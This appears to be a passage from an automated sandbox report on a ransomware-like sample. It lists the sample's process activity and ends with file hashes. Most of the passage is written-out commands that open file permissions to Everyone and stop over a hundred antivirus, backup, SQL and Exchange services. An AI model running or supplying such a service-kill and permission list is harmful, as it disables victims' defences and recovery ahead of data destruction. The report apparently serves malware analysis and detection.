C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
95ca1f57e0c1bdbd5a1a730fe9dbf141
SHA1f7494d16f3c2815abecca1e74fb1a980aadb1151
SHA256a8d03441421cd454674e855f3a951f41ba35cc3a15e11d7280992ed9450bfca2
SHA5128846e11a14cd4a3e13990ca2d2ea35bb7ec4bc569ea316ba294aa1d7e449674c9127993074557b2c9144577457430cc9a657bca7cce9815fbbe263424fc26ace
-
MD5
5c3b9825a17c2f9412fa23e09b2b0645
SHA17eaa7f7396123ba2ef7fb482fb1132e38a417f4d
SHA256af6610c8bdf99ab3391559dc51b18dc9ff2c734a158287b06640f3e6fcd1100a
SHA5120a43012a23611f2b4b7000746b1fa2df3d0e1c20de837ddec165b1385cc9d613990614d83d655f36659b0eec9153d4bdaed84a4a2e77809fee29af6291dadb4f
-
MD5
ca6808ef5a41d2b0ad115098c916a0e2
SHA1060b1c51ca26f060c5922946ac10b412d400b11a
SHA2560cad5ccab5a344b8643bb4a318768e38648fed20afd94d84f5065e8dd5deeac9
SHA51284167837ce735d130a81dd93499bccab732efc48118d311a0186b381311202620f90a27721df09b25e9f21a2ac9f3a757fe6109e20c0ec3d6b895574c547cba6
-
MD5
87f1f079101e4c04680c487652995c86
SHA1ca1f789dd96dd639780f694e79a806859dcb76e0
SHA256909e882ba7ab7aa8f1c8009c0015486403c23a24d31959e7f81d2ee6551dfc14
SHA5126e28a1f6862fcb0d36c6d489f2deb5a796453dce2d897425694f93a0a24bdf70f94a930b091a4454fc936cb0862d4b7ad81f5f5bab59eda64f9416b11260190f
-
MD5
0d5316e7fcbcb874734ef07a21fa05fb
SHA14d740f1ced2ddbdd3c7a8dc65292ca46880fdfc1
SHA2560457c1a00692444ba6d97d868bb622fd36eb40a65974eebeb545e34970a55681
SHA512bee46e87b8e5c2ad53c2c3ac2ca9fb782de94f4e7eb7a4db3ea185f047d6fedd8d34a472602ce8419b912c6642db8848919911c68c0c3e4b4456c12204b075d1
-
MD5
0d5316e7fcbcb874734ef07a21fa05fb
SHA14d740f1ced2ddbdd3c7a8dc65292ca46880fdfc1
SHA2560457c1a00692444ba6d97d868bb622fd36eb40a65974eebeb545e34970a55681
SHA512bee46e87b8e5c2ad53c2c3ac2ca9fb782de94f4e7eb7a4db3ea185f047d6fedd8d34a472602ce8419b912c6642db8848919911c68c0c3e4b4456c12204b075d1
-
MD5
30ff7bdce3ae6723b514e0795495b879
SHA1eba4c07f3553063b31142826701be11464ac4691
SHA256631ff8abd811e60b7f31568de93068085c5524e39da6a76f91b617fe78d073d6
SHA5121f75983e0bc7b2bb2bb51108bb26524bbdb62f099a80b9bca7a7b45f47055602d85cf7a446c2eca519f66fc4384b46e530af5a612e6d1ed686948e2670a6b7ce
-
MD5
7729c85c07370e253dc073676dac6bf8
SHA1fdfb01e89f06c69a17c615fbce13227616e659b8
SHA25662378b2c729709861d0a03fffee35f7b4bba928466a4466338f3238aef047f45
